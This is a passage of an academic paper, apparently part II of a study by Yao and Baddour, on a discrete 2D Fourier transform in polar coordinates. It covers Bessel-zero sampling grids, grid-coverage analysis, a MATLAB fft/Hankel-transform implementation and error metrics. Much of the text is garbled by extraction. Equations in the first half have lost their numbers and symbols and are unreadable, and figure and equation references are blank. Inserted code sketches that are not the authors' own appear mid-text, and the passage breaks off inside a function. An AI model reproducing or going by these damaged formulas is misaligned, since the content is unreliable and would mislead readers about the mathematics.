relationship. a possible symmetric kernel is discussed in the first part of this two-part paper and parseval relationships are discussed further there (baddour, ). discrete transform to approximate the continuous transform in this section, relationships between discretely sampled values of the function and its continuous d ft are presented in the case of a space-limited or band-limited function. these relationships were derived in the first part of the paper and are repeated here to demonstrate how they form the basis for the using the discrete transform to approximate the continuous transform at specified sampling points. space-limited functions consider a function in the space domain f ðr; uÞ which is space limited to r ; r½ �. this implies that the function is zero outside of the circle bounded by r ; r½ �. an approximate relationship between sampled values of the continuous function and sampled values of its continuous forward d transform f r; cð Þ has been derived in the first part of the two-part paper as f jqm r ; pq n � � � pr xn � k¼ xm p¼�m f jpkr jpn ; pp n � � n xm n¼�m i�njn jnkjnm jnn � � j nn j nþ jnkð Þ e �i pnpn e þi pnqn ( ) similarly, an approximate relationship between sampled values of the continuous forward transform f r; cð Þ and sampled values of the continuous original function f ðr; uÞ was shown to be given by f jpkr jpn ; pp n � � � pr xn � m¼ xm q¼�m f jqm r ; pq n � � n xm n¼�m injn jnmjnk jnn � � j nþ jnmð Þ e þi pnpn e �i pnqn ( ) yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . 
/peerj-cs. https://peerj.com/computer-science/ in eqs. ( ) and ( ), f(r, θ) is the original function in d space and fðr; cÞ is the d ft of the function in polar coordinates. to evaluate if the d dft as proposed in eqs. ( ) and ( ) can be used to approximate sampled values of f(r, θ) and fðr; cÞ, the process is as follows. for the forward transform, we start with the continuous f(r, θ), evaluate it at the sampling points and then assign this value to fpk via fpk ¼ f jpkr jpn ; pp n � � ( ) then, fqm is calculated from the d dft scaled by pr , eq. ( ), that is fqm ¼ pr f fpk � � ¼ pr xn � k¼ xm p¼�m fpke � qm;pk ( ) the factor of pr is necessary so that the evaluation in eq. ( ) matches the expression in eq. ( ). to evaluate if the proposed d dft can be used to approximate the continuous transform, the question becomes how well fqm calculated from the d dft in eq. ( ) approximates f jqm r ; pq n � � —the values of the continuous d ft evaluated on the sampling grid. to evaluate the inverse d dft, the process is similar. we start with the continuous fðr; cÞ, evaluate it at the sampling points and assign this value to fqm via fqm ¼ f jqm r ; pq n � � ( ) now, fpk is calculated from a scaled version of the inverse d dft, eq. ( ) that is fpk ¼ pr f� fqm � � ¼ pr xn � m¼ xm q¼�m fqme þ qm;pk ( ) to evaluate if the proposed transform can approximate the continuous transform, the question becomes how well fpk calculated from eq. ( ) approximates f jpkr jpn ; pp n � � —the values of the continuous function evaluated on the sampling grid. band-limited functions the process for band-limited functions follows the same process as outlined in the previous section, with the exception that the sampling points and scaling factors are slightly different as they are now given in terms of the band limit rather than the space limit. now consider functions in the frequency domain f q; cð Þ with an effective band limit r ; wr � . that is, we suppose that the d ft f r; cð Þ of f ðr; uÞ is band-limited, meaning that f r; cð Þ is zero for r � wr ¼ pw. the variable wr is written in this form since w would typically be quoted in units of hz (cycles per second) if using temporal units or cycles per meter if using spatial units. therefore, the multiplication by p ensures that the final units are in s� or m� . the approximate relationship between sampled yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ values of the continuous d ft f r; cð Þ and sampled values of the original continuous function f r; uð Þ was derived in the first part of the paper and is given by f jqmwr jqn ; pq n � � � p w r xn � k¼ xm p¼�m f jpk wr ; pp n � � n xm n¼�m i�njn jnmjnk jnn � � j nþ jnkð Þ e �i pnpn e þi pnqn ( ) similarly, the inverse relationship between sampled values of f r; cð Þ and sampled values of f ðr; uÞ was shown to be given by f jpk wr ; pp n � � � w r p xn � m¼ xm q¼�m f jqmwr jqn ; pq n � � n xm n¼�m injn jnkjnm jnn � � j nn j nþ jnmð Þ e �i pnqn e þi pnpn ( ) the relationships in eqs. ( ) and ( ) give relationships between the sampled values of the original function and sampled values of its d ft. to evaluate the forward d dft, we start with f r; uð Þ, evaluate it at the (bandlimited specific) sampling points and assign this value to fpk via fpk ¼ f jpk wr ; pp n � � ( ) then, fqm is calculated from the discrete transform scaled by p w r , eq. 
( ), that is fqm ¼ p w r f fpk � � ¼ p w r xn � k¼ xm p¼�m fpke � qm;pk ( ) to evaluate if the proposed d dft can be used to approximate the continuous transform, the question is how well fqm calculated from eq. ( ) approximates f jqmwr jqn ; pq n � � , which are the values of the continuous d ft, evaluated on the sampling grid. the evaluation of the inverse transform for the band-limited function proceeds similarly by comparing values obtained from the inverse d dft to the values obtained by sampling the continuous function directly. the relationships given by eqs. ( ), ( ), ( ) and ( ), were the motivating definition of a d dft in polar coordinates, defined in the first part of this two-part paper. in the context of this second part of the two-part paper, they are also the relationships that permit the use of the discrete transform to approximate the continuous transform at the specified sampling points. they are also the relationships that permit the examination of whether the discrete quantities fpk and fqm calculated via the proposed d dft are in fact reasonable approximations to the sampled values of the continuous functions, as stated in the objectives of the paper. discretization points and sampling grid the transforms defined in eqs. ( ) and ( ) can be applied to any matrix fpk to yield its forward transform fqm, which can then be transformed backwards by using the inverse transform. however, if these same discrete transforms are to be used for the purpose of approximating a continuous d ft, then these transforms need to be applied to the yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ specific sampled values of the continuous functions in both space and frequency domains, as shown in eqs. ( ), ( ) and ( ). the relationships in eqs. ( ) and ( ) define the sampling points that need to be used and it is noted that the points are defined differently based on whether we start with the assumption of a space or band limited function. these specific sampling points imply a specific sampling grid for the function. in this section, the sampling grid (its coverage and density in d) is analyzed. sampling points for a space-limited function, we assume that the original function of interest is defined over continuous r; uð Þ space where � r � r and � u � p. the discrete sampling spaces used for radial and angular sampling points in regular~r space r; uð Þ and ~v frequency r; cð Þ space are defined as rpk ¼ jpkr jpn up ¼ p p n ( ) and rqm ¼ jqm r cq ¼ q p n ( ) for a band limited function, the function is assumed band-limited to � r � wr, � c � p. the sampling space used for radial and angular sampling points in regular ~v frequency space r; cð Þ and~r space r; uð Þ for a bandlimited function is defined as rpk ¼ jpk wr up ¼ p p n ( ) and rqm ¼ jqmwr jqn cq ¼ q p n ( ) clearly, the density of the sampling points depends on the numbers of points chosen, that is on n and n . also clear is the fact that the grid is not equispaced in the radial variable. the sampling grid for a space-limited function are plotted below to enable visualization. in the first instance, the polar grids are plotted for the case r ¼ , n ¼ and n ¼ . these are shown in space (r space) and frequency (ρ space) in figs. and respectively. it should be noted that although we refer the grids in this article as polar grids, they are not true polar grids in the sense of equispaced sampling in the radial and angular coordinates. 
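the sampling points defined above are straightforward to generate numerically. the sketch below builds the spatial and frequency grids for a space-limited function using scipy's bessel-zero routine; it is an illustration with our own variable names, not the authors' (matlab) code.

```python
import numpy as np
from scipy.special import jn_zeros

def space_limited_grids(R, N1, N2):
    """sampling grids for a space-limited function on [0, R]:
    spatial radii   r_pk   = j_pk * R / j_pN2,  theta_p = 2*pi*p/N1,
    frequency radii rho_qm = j_qm / R,          psi_q   = 2*pi*q/N1,
    with p, q = -M..M (N1 = 2M + 1) and k, m = 1..N2-1."""
    M = (N1 - 1) // 2
    orders = np.arange(-M, M + 1)
    r = np.zeros((N1, N2 - 1))
    rho = np.zeros((N1, N2 - 1))
    for i, p in enumerate(orders):
        z = jn_zeros(abs(p), N2)        # zeros of J_|p|; J_{-p} has the same zeros
        r[i, :] = z[:-1] * R / z[-1]
        rho[i, :] = z[:-1] / R
    angles = 2 * np.pi * orders / N1
    return r, rho, angles

r, rho, angles = space_limited_grids(R=1.0, N1=15, N2=16)
print(r.shape, r.min(), r.max())        # note the central hole: the smallest radius is well above 0
```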
clearly, the grids in figs. and are fairly sparse, but the low values of n and n have been chosen so that the structure of the sampling points can be easily seen. it can be observed that there is a hole at the center area in both domains which is caused by the special sampling points. for higher values of the n and n , the grid becomes fairly dense, obtaining good coverage of both spaces, but details are harder to observe. to demonstrate, yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the polar grids are plotted for the case r = , n ¼ and n ¼ . these are shown in figs. and respectively. from figs. and , by choosing higher values of n and n , the sampling grid becomes denser, however there is still a gap in the center area. the sampling grids for band-limited functions are not plotted here since the sample grid for a band-limited function has the same shape as with space limited function but the domains are reversed. sample grid analysis from part i of the paper, it was shown that the d-ft can be interpreted as a dft in the angular direction, a dht in the radial direction and then an idft in the angular direction. hence, the sample size in the angular direction could have been decided by the nyquist sampling theorem (shannon, ), which states that fs > fmax ( ) where fs is the sample frequency and fmax is the highest frequency or band limit. in the radial direction, the necessary relationship for the dht is given by baddour & chouinard ( ) wrr ¼ jnn ( ) figure spatial sampling grid for a space-limited function with r = , n = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where wr is the effective band-limit, r is the effective space limit and jnn is the nth zero of jn rð Þ. for the d ft, since �m � p � m, the order of the bessel zero ranges from �m to m, the required relationship becomes minðjpn Þ � wrr ( ) the relationships jnn ¼ j�nn and j n < j� n < j� n < … < j�mn are valid (lozier, ), hence eq. ( ) can be written as j n � wrr ( ) it is pointed out in baddour ( ) and guizar-sicairos & gutiérrez-vega ( ) that the zeros of jn zð Þ are almost evenly spaced at intervals of p and that the spacing becomes exactly p in the limit as z ! . the reader unfamiliar with bessel functions is directed to references (bracewell, ; lozier, ). in fact, it is shown in dutt & rokhlin ( ) that a simple asymptotic form for the bessel function is given by jn zð Þ � ffiffiffiffiffiffi pz r cos z � n þ � � p � � ( ) figure frequency space sampling grid for a space-limited function with r = , n = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore, an approximation to the bessel zero, jnk is given by jnk � k þ n � � � p ( ) hence, eq. ( ) can be written to choose n approximately as n p � wrr ¼ pwr ) n � wr ( ) where the reader is reminded that the units of w is m− (the space equivalent of hz). n =r is the spatial sampling frequency and we see that eq. ( ) effectively makes the same statement as eq. ( ), as it should. intuitively, more sample points lead to more information captured, which gives an expectation that increasing n or n individually will give a better sampling grid coverage. 
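the rule of thumb for choosing the radial sample count from the band limit, and the size of the central hole in the grid discussed above, can both be checked numerically. the sketch below uses the asymptotic spacing of the bessel zeros quoted in the text; the test values, the extra safety sample, and the use of the average gap radius are our own assumptions.

```python
import numpy as np
from scipy.special import jn_zeros

# mcmahon-type approximation j_nk ~ (k + n/2 - 1/4)*pi versus the true zeros
n = 3
k = np.arange(1, 11)
print(np.max(np.abs(jn_zeros(n, 10) - (k + n / 2 - 0.25) * np.pi)))  # largest at k = 1, shrinks with k

# choosing the radial sample count: we need j_{0,N2} >= W_rho * R with W_rho = 2*pi*W;
# since j_{0,N2} ~ (N2 - 1/4)*pi, the rule of thumb N2 >= 2*W*R needs at most one extra sample
W, R = 10.0, 1.0
N2 = int(np.ceil(2 * W * R)) + 1
print(N2, jn_zeros(0, N2)[-1], 2 * np.pi * W * R)    # j_{0,N2} now exceeds W_rho * R

# relative size of the central hole of the spatial grid for a space-limited function:
# coverage = (pi R^2 - pi rbar^2) / (pi R^2), with rbar the mean of r_{0,1} and r_{M,1}
def spatial_coverage(N1, N2):
    M = (N1 - 1) // 2
    z0, zM = jn_zeros(0, N2), jn_zeros(M, N2)
    rbar = 0.5 * (z0[0] / z0[-1] + zM[0] / zM[-1])   # in units of R
    return 100.0 * (1.0 - rbar ** 2)

for N1 in (15, 31):
    for N2 in (16, 64):
        print(N1, N2, round(spatial_coverage(N1, N2), 2))   # larger N2 helps, larger N1 hurts
```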
however, it can be seen from figs. – that there is a gap in the center of the sample grid. from eqs. ( ) and ( ), the area of the gap in the center is related to the ranges of p and k, that is n and n . in the sections below, it is assumed that the sampling theorems are already satisfied (that is, an appropriate space and band limit is selected) and the relationship between n , n and the size of the gap will be discussed. figure spatial sampling grid for a space-limited function with r = , n = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ space-limited function in this section, it is assumed that the function is a space limited function, defined in r ½ ; r�. the sampling points are defined as eq. ( ) in the space domain and eq. ( ) in the frequency domain. in the following, a relationship between n , n and the area of the gap in both domains is discussed. sample grid in the space domain in the space domain, the effective limit in the space domain, r, is fixed. to analyze how the values of n and n affect the coverage of the grid in space domain, consider the following definition of ‘grid coverage’ ar ¼ pr � p�r pr ( ) where �r denotes the average radius of the gap (the hole in the middle of the grid). ar as defined in eq. ( ) is a measure of the “grid coverage” since it gives a percentage of how much of the original space limited domain area is captured by the discrete grid. for example, if the average radius of the center gap is zero, then ar would be %, that is, complete coverage. based on the observation of figs. and , the relationship figure frequency space sampling grid for a space-limited function with r = , n = and n = . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ r < r� < r� < r�m is valid. therefore, from eq. ( ), the average radius of the gap is given by �r ¼ ðr þ rm Þ ¼ j j n r þ jm jmn r � � ( ) hence, eq. ( ) for grid coverage can be written as ar ¼ � j j n þ jm jmn � � " # ( ) table shows the different values of grid coverage ar as the values of n and n are changed. from table , it can be seen that increasing n (sample size in the radial direction) tends to increase the grid coverage. since the effective space limit r is fixed, from eq. ( ) it follows that increasing n actually increases the effective band limit. however, increasing n (sample size in angular direction) will result in a bigger gap in the center of the grid, which then decreases the coverage. sample grid in the frequency domain similarly, coverage of the grid in the frequency domain is defined as ar ¼ pw r � p�r pw r ( ) where �r denotes the average radius of the gap. since �r ¼ ðr þ rm Þ ¼ ðj þ jm Þ r ( ) then, it follows that eq. ( ) for frequency domain grid coverage can be written as ar ¼ � ðj þ jm Þ r w r " # % ( ) from eq. ( ), it can be observed that the sample grid coverage in the frequency domain is affected by r, wr and m. since n ¼ m þ , in order to get a better grid coverage with a fixed wr, r and n can be adjusted. table shows the grid coverage ar for different values of r and n . 
from table , the conclusion for the frequency domain is that when the effective band limit is fixed, increasing r (effective space limit) tends to increase the coverage in the table spatial grid coverage, ar, with respect to different values of n and n (r is fixed). n n ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % ar = . % yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ frequency domain, while increasing n (sample size in the angular direction) decreases the coverage. however, from eq. ( ) it should be noted that to satisfy the sampling theorem, increasing r with fixed wr requires an increase in n at the same time. band-limited function in this section, we suppose that the function is an effectively band limited function, defined on r ½ ; wp�. the sampling points are defined as in eq. ( ) in the space domain and as in the frequency domain. in this subsection, the relationship between n , n and the area of the gap in both domains is discussed. sampling grid in the space domain the same definition of grid coverage in the space domain will be used as in eq. ( ). since the sampling points of a band-limited function are given by eqs. ( ) and ( ), the average radius of the gap can be defined as �r ¼ ðr þ rm Þ ¼ j wr þ jm wr � � ( ) therefore, the coverage of the grid in space domain can be written as ar¼ � ðj þ jm Þ w rr " # ( ) it can be observed that the grid coverage in the space domain of a band-limited function is the same as the grid coverage in the frequency domain of space limited function. sample grid in frequency domain the coverage of the grid in the frequency domain of a band limited function is defined by eq. ( ). with sampling points defined in eq. ( ), the average radius of the gap can be defined as �r ¼ ðr þ rm Þ ¼ j j n wr þ jm jmn wr � � ( ) the coverage of the grid in frequency domain can be written as ar ¼ � j j n þ jm jmn � � " # ( ) it can be observed that the grid coverage in the frequency domain of a band-limited function is the same as the grid coverage in the space domain of a space limited function. table frequency grid coverage, aρ, with respect to different values of r and n (wρ is fixed). n r aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % aρ = . % yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusion based on the discussion above, the following conclusions can be made: . increasing n (angular direction) tends to decrease the sampling grid coverage in both domains. increasing n (radial direction) tends to increase the sampling coverage in the space domain for a space-limited function and in the frequency domain for a frequency-limited function. so, if a signal changes sharply in the angular direction such that large values of n are needed, a large value of n is also needed to compensate for the effect of increasing n on the grid coverage. . for a space-limited function, if there is a lot of energy at the origin in the space domain, a larger value of n will be required to ensure that the sampling grid gets as close to the origin as possible in the space domain. if the function has a lot of energy at the origin in the frequency domain, a large value for both n and r will be required to ensure adequate grid coverage. . 
for a band-limited function, if there is a lot of energy at the origin in the frequency domain, a large value of n will be needed to ensure that the sample grid gets as close to the origin as possible in the frequency domain. if the function has a lot of energy at the origin in the space domain, large values for both n and wr are required. numerical computation of the transform we have already demonstrated in part i of the paper that the discrete d ft in polar coordinates can be interpreted as a dft, dht and then idft. this interpretation is quite helpful in coding the transform and in exploiting the speed of the fft (fast fourier transform) in implementing the computations. in this section, we explain how the speed of matlab’s (mathworks ) built-in code (or similar software) can be exploited to implement the d dft in polar coordinates. forward transform the values fpk can be considered as the entries in a matrix. to transform fpk ! fqm, the operation is performed as a sequence of steps which are a d dft (column-wise), followed by a scaled d dht (row-wise), finally followed by a d idft (column-wise). the reader is reminded that the range of indices is given by m; k ¼ . . . n � and n; p; q ¼ �m . . . m, where m þ ¼ n . these steps can be summarized succinctly by rewriting eq. ( ) as fqm ¼ n xm n¼�m pr i�n jnn xn � k¼ ynn m;k xm p¼�m fpke �in ppn |fflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflffl} d dft column‐wise |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} scaled d dht row‐wise e þin pqn |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} inverse d dft column‐wise ( ) yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where the dht is defined in baddour & chouinard ( ) via the transformation matrix ynn m;k ¼ jnn j nþ jnkð Þ jn jnmjnk jnn � � � m; k � n � ( ) matlab code for the dht is described in baddour & chouinard ( ). the inverse d dft can be similarly interpreted, as shown in “inverse transform”. inverse transform the steps of the inverse d dft are the reverse of the steps outlined above for the forward d dft. for p ¼ �m . . . m and k ¼ . . . n � , eq. ( ) this can be expressed as fpk ¼ n xm n¼�m jnn i þn pr xn � m¼ ynn k;m xm q¼m fqme �i pnqn |fflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflffl} d dft ðcolumn‐wiseÞ |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} scaled d dft ðrow‐wiseÞ e þi pnpn |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} inverse d dft ðcolumn‐wiseÞ ( ) this parallels the steps taken for the continuous case, with each continuous operation (fourier series, hankel transform) replaced by its discrete counterpart (dft, dht). 
therefore, for both forward and inverse 2d-dft, the sequence of operations is a dft of each column of the starting matrix, followed by a dht of each row, a term-by-term scaling, followed by an idft of each column. this is a significant computational improvement because by interpreting the transform this way, the fast fourier transform (fft) can be used, which reduces the computational time quite significantly in comparison with a direct implementation of the summation definitions in eqs. ( ) and ( ).

interpretation of the sampled forward transform in matlab terms

to use the built-in matlab function fft, a few operations are required. first, we define matlab-friendly indices p′ = p + (m + 1) and n′ = n + (m + 1) so that p, n = −m ... m become p′, n′ = 1 ... 2m + 1 = 1 ... n (since 2m + 1 = n ). that is, the primed variables range from 1 ... 2m + 1 rather than −m ... m. hence, if the matrix f with entries f_{p′k} is defined, where p′ = 1 ... n , k = 1 ... n − 1, then the first step, which is a column-wise dft, can be written as the matlab-defined dft as

$\bar{f}_{n'k} = \sum_{p'=1}^{N_2} f_{pk}\, e^{-\frac{2\pi i\,(p'-1-M)(n'-1-M)}{N_2}}$ ( )

the overbar denotes a dft. the definition of the dft in matlab is actually given by the relationship

$\bar{f}_{n'k} = \sum_{p'=1}^{N_2} f_{p'k}\, e^{-\frac{2\pi i\,(p'-1)(n'-1)}{N_2}}$ ( )

since the two exponents agree once the rows of the matrix are circularly shifted, we can sample the original function to obtain the discrete fpk values, put them in the matrix f_{p′k}, and then shift the matrix f_{p′k} by m + 1 along the column direction. in matlab, the function circshift(a, k, dim) can be used, which circularly shifts the values in array a by k positions along dimension dim. inputs k and dim must be scalars. specifically, dim = 1 indicates the columns of matrix a and dim = 2 indicates the rows of matrix a. hence, eq. ( ) can be written as

$\bar{f}_{n'k} = \mathrm{fft}\bigl(\mathrm{circshift}(f_{p'k},\, M+1,\, 1),\, N_2,\, 1\bigr)$ ( )

in matrix operations, this is equivalent to stating that each column of f_{p′k} is dft'ed to yield \bar{f}_{n′k}. the second step in eq. ( ) is a dht of order n, transforming \bar{f}_{n′k} → \hat{\bar{f}}_{n′l} so that the k subscript is hankel transformed to the l subscript. the overhat denotes a dht. in order to relate the order n to the index n′, we need to shift \bar{f}_{n′k} by −(m + 1) along the column direction so that the order ranges from −m to m:

$\hat{\bar{f}}_{n'l} = \sum_{k=1}^{N_1-1} \frac{2}{j_{nN_1}\, J_{n+1}^{2}(j_{nk})}\, J_n\!\left(\frac{j_{nl}\, j_{nk}}{j_{nN_1}}\right) \mathrm{circshift}\bigl(\bar{f}_{n'k},\, -(M+1),\, 1\bigr)$ for n′ = 1 ... n , l = 1 ... n − 1, where n = n′ − (m + 1) ( )

by using the hankel transform matrix defined in baddour & chouinard ( ), eq. ( ) can be rewritten as

$\hat{\bar{f}}_{n'l} = \Bigl[\mathrm{circshift}\bigl(\bar{f}_{n'k},\, -(M+1),\, 1\bigr)\,\bigl(Y^{nN_1}_{l,k}\bigr)^{T}\Bigr]$ for n′ = 1 ... n , l = 1 ... n − 1, where n = n′ − (m + 1) ( )

in matrix operations, this states that each row of \bar{f}_{n′k} is dht'ed to yield \hat{\bar{f}}_{n′l}. these are now scaled to give the fourier coefficients of the 2d dft, \hat{\bar{f}}_{n′l} → \bar{F}_{n′l}. in order to proceed to an idft in the next step, it is necessary to shift the matrix by m + 1 along the column direction after scaling:

$\bar{F}_{n'l} = \mathrm{circshift}\!\left(\frac{2\pi R^2}{j_{nN_1}}\, i^{-n}\, \hat{\bar{f}}_{n'l},\, M+1,\, 1\right)$ for n′ = 1 ... n , l = 1 ... n − 1, where n = n′ − (m + 1) ( )

this last step is a 1d idft for each column of \bar{F}_{n′l} to obtain F_{ql}. using 2m + 1 = n , and q′ = q + 1 + m, this can be written as

$F_{q'l} = \frac{1}{N_2}\sum_{n'=1}^{N_2} \bar{F}_{n'l}\, e^{+i\frac{2\pi (n'-1-M)(q'-1-M)}{N_2}} = \frac{1}{N_2}\sum_{n'=1}^{N_2} \bar{F}_{n'l}\, e^{+i\frac{2\pi (n'-1)(q'-1-M)}{N_2}} = \mathrm{circshift}\bigl(\mathrm{ifft}(\bar{F}_{n'l},\, N_2,\, 1),\, -(M+1),\, 1\bigr)$ ( )
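the steps above translate almost directly into matlab. the following is a minimal sketch, not the paper's own supplemental code: it assumes that the dht matrices and the scale factors have already been constructed (here as a cell array Y, with Y{n'} the (n −1)×(n −1) transform matrix of order n = n′ − (m + 1), and a matrix S holding the factors 2πr² i^{−n}/j_{n,N1} row by row), for example with the code of baddour & chouinard.

```matlab
% Forward 2D DFT in polar coordinates as three sequential operations:
% column-wise DFT, row-wise DHT, term-by-term scaling, column-wise IDFT.
% fpk : N2 x (N1-1) matrix of samples, rows = angular index, cols = radial index
% Y   : cell array of DHT matrices (assumed input, see lead-in)
% S   : N2 x (N1-1) matrix of scale factors (assumed input, see lead-in)
function Fqm = forward_polar_dft(fpk, Y, S)
    N2 = size(fpk, 1);
    M  = (N2 - 1) / 2;                                   % N2 = 2M + 1

    % step 1: column-wise DFT, with the rows shifted so that MATLAB's
    % 1-based indexing lines up with p = -M..M
    Fbar = fft(circshift(fpk, M + 1, 1), N2, 1);

    % step 2: shift back so that row n' corresponds to order n = n' - (M+1),
    % then apply the DHT of order n to each row
    Fbar = circshift(Fbar, -(M + 1), 1);
    Fhat = zeros(size(Fbar));
    for np = 1:N2
        Fhat(np, :) = Fbar(np, :) * Y{np}.';
    end

    % step 3: term-by-term scaling, shift, column-wise inverse DFT, shift back
    Fqm = circshift(ifft(circshift(S .* Fhat, M + 1, 1), N2, 1), -(M + 1), 1);
end
```

the inverse transform is the mirror image of this sketch, with the inverse scale factors and the dht applied across the other radial index.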
interpretation of the sampled inverse transform in matlab terms

similar to the forward transform, matlab-friendly indices q′ = q + (m + 1) and n′ = n + (m + 1) are also defined. hence, if the matrix f with entries F_{q′l} is defined, where q′ = 1 ... n , l = 1 ... n − 1, it then follows that the first 1d dft step in eq. ( ) can be written as the matlab-defined dft as

$\bar{F}_{n'l} = \sum_{q'=1}^{N_2} F_{ql}\, e^{-i\frac{2\pi (n'-1-M)(q'-1-M)}{N_2}} = \sum_{q'=1}^{N_2} F_{q'l}\, e^{-i\frac{2\pi (n'-1-M)(q'-1)}{N_2}}$ for n′ = 1 ... n , l = 1 ... n − 1 ( )

if the original function can be sampled as F_{ql} and then put into the matrix F_{q′l}, then we need a circshift operation. so eq. ( ) can be written as

$\bar{F}_{n'l} = \mathrm{fft}\bigl(\mathrm{circshift}(F_{q'l},\, M+1,\, 1),\, N_2,\, 1\bigr)$ ( )

subsequently, a dht of order n is required, transforming \bar{F}_{n′l} → \hat{\bar{F}}_{n′k} so that the l subscript is hankel transformed to the k subscript. to achieve this, circshift is also needed here:

$\hat{\bar{F}}_{n'k} = \Bigl[\mathrm{circshift}\bigl(\bar{F}_{n'l},\, -(M+1),\, 1\bigr)\,\bigl(Y^{nN_1}_{k,l}\bigr)^{T}\Bigr]$ for n′ = 1 ... n , l = 1 ... n − 1, where n = n′ − (m + 1) ( )

this is followed by a scaling operation to obtain \hat{\bar{F}}_{n′k} → \bar{f}_{n′k} and then a circshift by (m + 1) so that

$\bar{f}_{n'k} = \mathrm{circshift}\!\left(\frac{j_{nN_1}}{2\pi R^2}\, i^{+n}\, \hat{\bar{F}}_{n'k},\, M+1,\, 1\right)$ for n′ = 1 ... n , k = 1 ... n − 1, where n = n′ − (m + 1) ( )

this last step is a 1d idft for each column of \bar{f}_{n′k} to get f_{p′k}. using 2m + 1 = n , and p′ = p + (m + 1), eq. ( ) can be written as

$f_{p'k} = \frac{1}{N_2}\sum_{n'=1}^{N_2} \bar{f}_{n'k}\, e^{+i\frac{2\pi (n'-1-M)(p'-1-M)}{N_2}} = \frac{1}{N_2}\sum_{n'=1}^{N_2} \bar{f}_{n'k}\, e^{+i\frac{2\pi (n'-1)(p'-1-M)}{N_2}} = \mathrm{circshift}\bigl(\mathrm{ifft}(\bar{f}_{n'k},\, N_2,\, 1),\, -(M+1),\, 1\bigr)$ ( )

in conclusion, in this section, by using the interpretation of the kernel as sequential dft, dht and idft operations, matlab (or similar software) built-in code can be used to efficiently implement the 2d dft algorithm in polar coordinates.

numerical evaluation of the 2d dft in polar coordinates to approximate the continuous ft

in this section, the 2d dft is evaluated for its ability to estimate the continuous ft at the selected special sampling points in the spatial and frequency domains.

method for testing the algorithm accuracy

in order to test the accuracy of the 2d-dft and 2d-idft in approximating the continuous counterpart, the dynamic error is proposed as a metric. the dynamic error is defined as (guizar-sicairos & gutiérrez-vega, )

$E(\nu) = 20\log_{10}\!\left(\frac{\lvert C(\nu) - D(\nu)\rvert}{\max \lvert D(\nu)\rvert}\right)$ ( )

where c(ν) is the continuous forward or inverse 2d-ft and d(ν) is the value obtained from the discrete counterpart. the dynamic error is defined as the ratio of the absolute error to the maximum amplitude of the discrete function, calculated on a log scale. therefore, a large negative value represents an accurate discrete transform. the dynamic error is used instead of the percentage error in order to avoid division by zero.

precision

the precision of the algorithm is an important evaluation criterion, which is tested by sequentially performing a pair of forward and inverse transforms and comparing the result to the original function. high precision indicates that numerical evaluation of the transform does not add much error. an average of the absolute error between the original function and the calculated counterpart at each sample point is used to measure the precision. it is given by

$E = \frac{1}{(N_1 - 1)\, N_2}\sum \lvert f - \tilde{f} \rvert$ ( )

where f is the original function and \tilde{f} is the value obtained after sequentially performing a forward and then inverse transform. an ideal precision would result in the absolute error being zero.
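both metrics are easy to script. the sketch below is ours, not the paper's supplemental code; the 20 log10 (db) form of the dynamic error is assumed from the usual convention of guizar-sicairos & gutiérrez-vega, since the constant is not legible above, and the round-trip check assumes forward and inverse functions like the one sketched earlier.

```matlab
% Dynamic error (dB) between the sampled continuous transform Ccont and the
% discretely computed transform Ddisc (same-size complex matrices).
function E = dynamic_error(Ccont, Ddisc)
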